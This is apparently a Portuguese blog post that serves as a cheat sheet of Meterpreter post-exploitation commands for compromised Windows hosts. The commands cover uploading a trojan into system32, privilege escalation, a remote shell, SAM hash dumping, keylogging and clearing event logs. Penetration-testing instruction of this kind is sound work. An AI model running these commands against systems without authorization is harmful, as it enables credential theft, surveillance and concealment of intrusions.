O MeterPreter é um interpretados de comandos do metasploit framework.
Uma vez comprometido o sistema com um exploit você provavelmente irá interagir com o sistema. É nessa hora que entra em ação o meterpreter
No artigo anterior Metasploit, umas das melhores ferramentas de pentest eu passo alguns dos comandos mais básicos da solução junto com um vídeo do youtube onde acabou usando em determinado momento o “meterpreter“.
Comandos básicos do meterpreter
Listar arquivos
meterpreter > ls
Copiar um arquivo
meterpreter > download c:\\boot.ini
Enviar um arquivo
meterpreter > upload evil_trojan.exe c:\\windows\\system32
Visualizar informações de rede
meterpreter > ipconfig
Exibir qual o usuários está executando o Meterpreter
meterpreter > getuid
⭐️ Ter acesso como system
meterpreter > getsystem
Ganhar privilegios
meterpreter > user priv
Executar um comando na maquina remota
meterpreter > execute -f cmd.exe -i –H
⭐️ Usar o shell (prompt) remoto
meterpreter > shell
Exibir o tempo de ociosidade do sistema remoto
meterpreter > idletime
⭐️ Exibir a lista do banco de dados SAM usando um POST do Mestasploit
meterpreter > run post/windows/gather/hashdump
Iniciar um keylogger nativo do meterpreter
meterpreter > keyscan_start
Para o keylogger
meterpreter > keyscan_stop
Analisar o que foi capturado
meterpreter > keyscan_dump
Limpar eventos
clearev
Mais informações você encontra na série da Offensive Security https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
1 Trackback / Pingback